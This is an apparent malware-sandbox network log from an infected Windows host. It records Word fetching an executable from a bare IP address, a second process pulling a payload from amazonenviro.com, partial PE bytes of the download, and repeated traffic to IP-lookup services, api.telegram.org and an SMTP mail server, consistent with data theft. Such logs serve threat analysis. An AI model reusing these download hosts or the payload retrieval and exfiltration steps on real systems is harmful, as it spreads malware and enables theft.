                                                                                                                                          Jan 6, 2025 07:54:43.170027018 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:43.176481962 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.176569939 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:43.304183006 CET44353788188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.305802107 CET53788443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:43.305825949 CET44353788188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.457645893 CET44353788188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.457709074 CET44353788188.114.97.3192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.457760096 CET53788443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:43.458158970 CET53788443192.168.2.5188.114.97.3
                                                                                                                                          Jan 6, 2025 07:54:43.498322964 CET5378280192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:43.498961926 CET53795443192.168.2.5149.154.167.220
                                                                                                                                          Jan 6, 2025 07:54:43.498992920 CET44353795149.154.167.220192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.499069929 CET53795443192.168.2.5149.154.167.220
                                                                                                                                          Jan 6, 2025 07:54:43.499644995 CET53795443192.168.2.5149.154.167.220
                                                                                                                                          Jan 6, 2025 07:54:43.499658108 CET44353795149.154.167.220192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.503341913 CET8053782132.226.8.169192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.503395081 CET5378280192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:43.715552092 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.715877056 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:43.721646070 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.863943100 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:43.864168882 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:43.873775959 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.022413015 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.023478031 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.028283119 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.127839088 CET44353795149.154.167.220192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.127937078 CET53795443192.168.2.5149.154.167.220
                                                                                                                                          Jan 6, 2025 07:54:44.129468918 CET53795443192.168.2.5149.154.167.220
                                                                                                                                          Jan 6, 2025 07:54:44.129478931 CET44353795149.154.167.220192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.129724979 CET44353795149.154.167.220192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.131222010 CET53795443192.168.2.5149.154.167.220
                                                                                                                                          Jan 6, 2025 07:54:44.175328970 CET44353795149.154.167.220192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.178168058 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.178180933 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.178195953 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.178208113 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.178220987 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.178237915 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.178261995 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.180754900 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.185559034 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.328397036 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.331860065 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.337869883 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.379817963 CET44353795149.154.167.220192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.379873037 CET44353795149.154.167.220192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.382025957 CET53795443192.168.2.5149.154.167.220
                                                                                                                                          Jan 6, 2025 07:54:44.382275105 CET53795443192.168.2.5149.154.167.220
                                                                                                                                          Jan 6, 2025 07:54:44.479919910 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.483047962 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.487937927 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.630354881 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.631228924 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.636121035 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.780345917 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.780613899 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.785455942 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.929006100 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:44.929544926 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:44.934474945 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.078737020 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.078996897 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:45.083913088 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.230648994 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.230865955 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:45.237014055 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.383296967 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.383615017 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:45.388639927 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.543906927 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.544811010 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:45.544920921 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:45.544940948 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:45.545018911 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:45.549627066 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.549765110 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.549870014 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.549880028 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.792880058 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:45.834784985 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:50.103854895 CET5373880192.168.2.5132.226.8.169
                                                                                                                                          Jan 6, 2025 07:54:50.312705994 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:50.318624973 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:50.318706036 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:50.854343891 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:50.854557991 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:50.859411001 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.000725985 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.000953913 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.006177902 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.155625105 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.155972958 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.160891056 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.314444065 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.314476013 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.314491034 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.314512968 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.314522028 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.314523935 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.314553976 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.319545031 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.324331045 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.469363928 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.473007917 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.478725910 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.620310068 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.622750998 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.628277063 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.769885063 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.770844936 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.775741100 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.917784929 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:51.918025017 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:51.922885895 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.064421892 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.064676046 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.069574118 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.211771011 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.212028027 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.216856956 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.360187054 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.360775948 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.365513086 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.508322954 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.508671045 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.513513088 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.669486046 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.673171997 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.673224926 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.673243999 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.673243999 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:54:52.677975893 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.678097963 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.678141117 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.915534019 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:52.959860086 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:55:06.184756994 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:56:12.492094994 CET53704587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:12.496943951 CET58753704208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:12.642179966 CET58753704208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:12.642626047 CET53704587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:12.647710085 CET58753704208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:12.647784948 CET53704587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:23.195144892 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:23.200345993 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:23.342118025 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:23.342642069 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:23.347630024 CET58753793208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:23.347687006 CET53793587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:30.335822105 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:30.340730906 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:30.482259035 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:30.485795975 CET53841587192.168.2.5208.91.198.176
                                                                                                                                          Jan 6, 2025 07:56:30.490873098 CET58753841208.91.198.176192.168.2.5
                                                                                                                                          Jan 6, 2025 07:56:30.491432905 CET53841587192.168.2.5208.91.198.176

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 6, 2025 07:54:04.451196909 CET5784353192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:04.465109110 CET53578431.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:10.967629910 CET6435553192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:10.974785089 CET53643551.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:12.866058111 CET6296953192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:12.872827053 CET53629691.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:16.250803947 CET53505241.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:24.947267056 CET5476153192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:24.953825951 CET53547611.1.1.1192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:32.465090990 CET5909653192.168.2.51.1.1.1
                                                                                                                                          Jan 6, 2025 07:54:32.779500961 CET53590961.1.1.1192.168.2.5

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Jan 6, 2025 07:54:04.451196909 CET192.168.2.51.1.1.10x9962Standard query (0)amazonenviro.comA (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:10.967629910 CET192.168.2.51.1.1.10x9c73Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:12.866058111 CET192.168.2.51.1.1.10x987Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:24.947267056 CET192.168.2.51.1.1.10xf408Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:32.465090990 CET192.168.2.51.1.1.10x8f7bStandard query (0)mail.techniqueqatar.comA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Jan 6, 2025 07:54:04.465109110 CET1.1.1.1192.168.2.50x9962No error (0)amazonenviro.com166.62.27.188A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:10.974785089 CET1.1.1.1192.168.2.50x9c73No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:10.974785089 CET1.1.1.1192.168.2.50x9c73No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:10.974785089 CET1.1.1.1192.168.2.50x9c73No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:10.974785089 CET1.1.1.1192.168.2.50x9c73No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:10.974785089 CET1.1.1.1192.168.2.50x9c73No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:10.974785089 CET1.1.1.1192.168.2.50x9c73No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:12.872827053 CET1.1.1.1192.168.2.50x987No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:12.872827053 CET1.1.1.1192.168.2.50x987No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:24.953825951 CET1.1.1.1192.168.2.50xf408No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                          Jan 6, 2025 07:54:32.779500961 CET1.1.1.1192.168.2.50x8f7bNo error (0)mail.techniqueqatar.com208.91.198.176A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • reallyfreegeoip.org
                                                                                                                                          • api.telegram.org
                                                                                                                                          • 147.124.216.113
                                                                                                                                          • amazonenviro.com
                                                                                                                                          • checkip.dyndns.org

                                                                                                                                          HTTP Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.549710147.124.216.113803732C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:02.020010948 CET182OUTGET /image.exe HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-ch
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                          Host: 147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.539633989 CET1236INHTTP/1.1 200 OK
                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                          Last-Modified: Sun, 05 Jan 2025 22:54:23 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          ETag: "185c71c3c45fdb1:0"
                                                                                                                                          Server: Microsoft-IIS/8.5
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:02 GMT
                                                                                                                                          Content-Length: 1161216
                                                                                                                                          Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED]
                                                                                                                                          Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*@@@Pn& |TW.text `.itextH `.data@ @.bss6.idatan&P(@.tls4.rdata@@.reloc|~@B.rsrc @@@@@
                                                                                                                                          Jan 6, 2025 07:54:02.539652109 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01
                                                                                                                                          Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@WideString@@
                                                                                                                                          Jan 6, 2025 07:54:02.539661884 CET1236INData Raw: 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df
                                                                                                                                          Data Ascii: (z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<x,<DD@,<xH9JtG!(G
                                                                                                                                          Jan 6, 2025 07:54:02.539668083 CET1236INData Raw: fe 29 3d 20 17 47 00 89 35 1c 17 47 00 eb 21 0f b7 43 1a 89 c7 e8 e5 fc ff ff 89 c6 85 c0 75 10 a2 18 17 47 00 88 03 5f 5e 5b c3 80 64 37 fc f7 8d 4f 06 89 4e fc 31 c0 a2 18 17 47 00 89 1e 89 46 08 c7 46 0c 01 00 00 00 89 73 10 8d 46 20 0f b7 4b
                                                                                                                                          Data Ascii: )= G5G!CuG_^[d7ON1GFFsF KS){p_^[%Gt?jv%Gt)j`=,0u#(Gt^#$Gt
                                                                                                                                          Jan 6, 2025 07:54:02.539675951 CET896INData Raw: 23 5e fc 09 eb 89 5e fc 89 cb 8b 57 fc f6 c2 01 75 09 83 ca 08 89 57 fc eb 17 90 89 f8 83 e2 f0 01 d3 01 d7 81 fa 30 0b 00 00 72 05 e8 ee f6 ff ff 89 5f f8 8d 43 03 89 44 2e fc 81 fb 30 0b 00 00 72 0a 8d 04 2e 89 da e8 12 f7 ff ff c6 05 18 17 47
                                                                                                                                          Data Ascii: #^^WuW0r_CD.0r.G]_^[to]_^[G,9=MGtO%Gt'QRjfZY%GtQRjLZY#^Gt~,9w
                                                                                                                                          Jan 6, 2025 07:54:02.578326941 CET1236INData Raw: 92 8d 14 92 83 f9 01 83 df ff c1 e8 1a 81 e2 ff ff ff 03 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 19 81 e2 ff ff ff 01 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07
                                                                                                                                          Data Ascii: 0000?000G_@SV^[USVE@;rM
                                                                                                                                          Jan 6, 2025 07:54:02.578353882 CET1236INData Raw: d8 07 fe ff ff 85 f8 47 fe ff 8b c3 e8 1e fa ff ff 8b d8 85 db 75 8e 8b 7f 04 81 ff 08 17 47 00 0f 85 72 ff ff ff 8b 1d b0 37 47 00 eb 37 8b c3 83 c0 10 e8 5f fd ff ff 84 c0 75 26 c6 85 ff 47 fe ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8
                                                                                                                                          Data Ascii: GuGr7G7_u&GsGG[7GtG|GXG3G)@(AG7G>FOGGGGG
                                                                                                                                          Jan 6, 2025 07:54:02.578363895 CET448INData Raw: e8 da fe ff ff c7 05 08 17 47 00 08 17 47 00 c7 05 0c 17 47 00 08 17 47 00 be 00 04 00 00 ba a8 17 47 00 8b c2 89 00 89 40 04 83 c2 08 4e 75 f3 c7 05 ac 37 47 00 ac 37 47 00 c7 05 b0 37 47 00 ac 37 47 00 5f 5e 5b c3 8d 40 00 53 56 57 55 bb 08 17
                                                                                                                                          Data Ascii: GGGGG@Nu7G7G7G7G_^[@SVWUG7G{ohjW;u7<FHH@3H Ju[G@Ju^{hjS(;u6v]_^[=7Gt7GP3
                                                                                                                                          Jan 6, 2025 07:54:02.578506947 CET1236INData Raw: 59 09 c0 74 e7 89 01 c3 8d 40 00 e8 67 3a 00 00 83 b8 00 00 00 00 00 74 0f e8 59 3a 00 00 8b 80 00 00 00 00 8b 40 08 c3 33 c0 c3 e8 47 3a 00 00 83 b8 00 00 00 00 00 74 0f e8 39 3a 00 00 8b 80 00 00 00 00 8b 40 04 c3 33 c0 c3 53 56 e8 25 3a 00 00
                                                                                                                                          Data Ascii: Yt@g:tY:@3G:t9:@3SV%:t:^:3F3^[@FSV=GtGu9w4F^[@$PRQ9Y
                                                                                                                                          Jan 6, 2025 07:54:02.578519106 CET1236INData Raw: da dd 14 02 dd 54 02 08 83 c2 10 7c f4 dd c0 c3 90 90 90 85 d2 7e 50 88 4c 02 ff 83 e2 fe f7 da 8d 14 55 80 32 40 00 ff e2 90 90 66 89 48 1c 66 89 48 1a 66 89 48 18 66 89 48 16 66 89 48 14 66 89 48 12 66 89 48 10 66 89 48 0e 66 89 48 0c 66 89 48
                                                                                                                                          Data Ascii: T|~PLU2@fHfHfHfHfHfHfHfHfHfHfHfHfHfHf@SVWPtl11F t-tb+t_$t_xtZXtU0uFxtHXtCt t-0w%9w!Fut}TF~KxI[)G
                                                                                                                                          Jan 6, 2025 07:54:02.578531027 CET1236INData Raw: 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 60 37 40 00 8b 45 fc 50 e8 fe db ff ff 33 c0 5a 59 59 64 89 10 68 24 37 40 00 8b 45 fc 50 e8 d8 db ff ff c3 e9 06 09 00 00 eb ef 0f b7 05 20 f0 46 00 66 25 c0 ff 0f b7 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 f0 46
                                                                                                                                          Data Ascii: EPEPjjh`7@EP3ZYYdh$7@EP Ff%Uf?ff F]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- FVWp1A_^@USV3M3Uh'8@d0d E


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.549713166.62.27.188805560C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Jan 6, 2025 07:54:04.514368057 CET165OUTGET /245_Aiymwhpjxsg HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                          Host: amazonenviro.com
                                                                                                                                          Jan 6, 2025 07:54:05.433335066 CET1236INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:05 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade, Keep-Alive
                                                                                                                                          Last-Modified: Sun, 05 Jan 2025 22:51:37 GMT
                                                                                                                                          ETag: "2ca99af-bf3d0-62afd5ac0f2a3"
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 783312
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Keep-Alive: timeout=5
